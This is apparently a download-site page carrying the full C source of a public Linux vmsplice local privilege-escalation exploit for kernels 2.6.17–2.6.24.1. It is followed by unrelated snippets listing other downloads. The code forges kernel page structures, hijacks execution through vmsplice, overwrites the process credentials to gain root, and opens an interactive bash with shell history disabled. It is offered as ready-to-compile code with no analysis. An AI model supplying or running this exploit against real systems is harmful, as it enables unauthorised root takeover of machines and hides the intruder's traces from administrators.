/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
void kernel_code()
{
int i;
uint *p = get_current();
for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
exit_kernel();
}
void exit_code()
{
if (getuid() != 0)
die("wtf", 0);
printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}
int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];
uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");
if (!uid || !gid)
die("!@#$", 0);
/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);
pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;
/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);
/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;
signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}
分享到:
相关推荐
ClouderaImpala_JDBC-2.6.15.1017.zip,官方文档最新版本The Cloudera JDBC Driver for Hive enables your enterprise users to access Hadoop data through Business Intelligence (BI) applications with JDBC ...
此压缩包"ClouderaImpala_JDBC-2.6.17.1020.zip"包含了不同版本的JDBC驱动,适应不同Java兼容性需求的用户。 1. **JDBC接口**:Java Database Connectivity(JDBC)是Java编程语言用来访问数据库的标准API。它允许...
radhat el5 安装oracle rac需要用到的包kernel-xen-2.6.18-53.el5.i686.rpm
《Python库 Arcade 2.6.9.dev2:游戏开发的新篇章》 在Python的世界里,Arcade库是一个为开发者提供强大游戏开发功能的利器。这个名为“arcade-2.6.9.dev2-py3-none-any.whl”的压缩包文件,包含了最新的2.6.9版本...
kernel-default-2.6.17-jad1.i586.rpm 很多人都在找的lvs文件
redis资源安装包下载,tar包解压安装即可,数据缓存必备
kernel-api-html-2.6.17.part02 全面系统讲解linux内核2.6.17 api函数,数据结构,应用函数
这是什么该项目主要用于收集用于Linux平台特权提升的exp,仅用于帮助渗透测试人员在实战中快速实现特权提升。信息CVE ID 描述核仁 Linux内核2.4.20、2.2.24、2.4.25、2.4.26、...2.6.24 Linux内核2.6.17〜2.6.24.1 Li
在Linux系统中,"提权"是指通过某种方式获取比当前用户权限更高的权限,通常是从普通用户提升到管理员(root)权限。对于标题和描述提到的"Linux 2.6.17 提权",这可能涉及到的是针对该特定内核版本的安全漏洞利用。...
### Linux期末考试知识点详解 #### 一、选择题解析 **1. Linux 内核的稳定版本** - **选项分析**: - A. 2.5.24:此版本号中的“5”表示这是一个开发版本,因此不是稳定版。 - B. 2.6.17:此版本号中的“6”表示...
两部分, linux内核 2.6.17 所有api函数,数据结构,应用函数。
在开发Web服务时,CXF框架是一个非常流行的工具,它提供了构建和消费Web服务的能力。同时,Spring框架作为Java企业级应用的基石,能够管理应用的依赖和生命周期。将CXF与Spring整合,可以实现更高效、灵活的服务开发...
描述进一步指出了这个驱动是为 s3c2410 芯片设计的,它使用了 arm-linux-gcc 4.0.2 交叉编译器,并且适用于 Linux 内核版本 2.6.17.14。标签中的关键词细化了这些信息,强调了工具链、操作系统、驱动类型和处理器...
在移植Linux 2.6.14.1到这种硬件上时,需要对内核源码进行一些修改以适配硬件特性。以下是一些关键的步骤和知识点: 1. **解压内核源码**: 使用`tar jxvf linux-2.6.14.1.tar.bz2`命令来解压缩内核源代码。 2. *...
[root@linux-a Smokeping-2.6.17]# ./configure --prefix=/usr/local/smokeping --sysconfdir=/etc/smokeping [root@linux-a Smokeping-2.6.17]# make && make install ``` 4. 创建配置文件和目录: ```bash ...
Linux内核空间到用户空间数据传输的技术在许多系统调试和性能分析中至关重要。Relay是一种高效的数据传输机制,尤其适用于需要大量数据从内核传输到用户空间的情况。它解决了传统方法如printk()在处理大数据量时的...
我们需要如下压缩包:gcc-3.4.1.tar.gz glibc-2.3.3.tar.gz linux-2.6.17binutils-2.15.tar.gz glibc-linuxthreads-2.3.3.tar.gz gdb6.0a.tar.gz,且还要下载内核arm补丁,给它打补丁,之后再压缩成原来格式,并...
- `linux-2.6.17.tar.gz`:Linux内核源码,版本为2.6.17。 - `arm_linux_4.2.tar.gz`:GCC编译器工具链,版本为4.2.0,用于将C/C++代码编译为ARM架构的机器码。 - `rootfs.tar.gz`:预构建的文件系统,包含了操作...
/boot/vmlinuz-2.6.17-11-generic root=UUID=5cc79966-969d-4cd0-abb2-74a132efbd7c ro vga=794 quietsplash init4 ``` ##### 2. 进入单用户模式 - 如果常规运行级别无法解决问题,可以尝试进入单用户模式(运行...
**ImpalaJDBC41: Cloudera大数据访问的关键组件** ImpalaJDBC41是Cloudera提供的一种用于交互式查询和分析大数据的关键组件,它基于Java Database Connectivity (JDBC) 标准,允许应用程序与Cloudera Impala进行...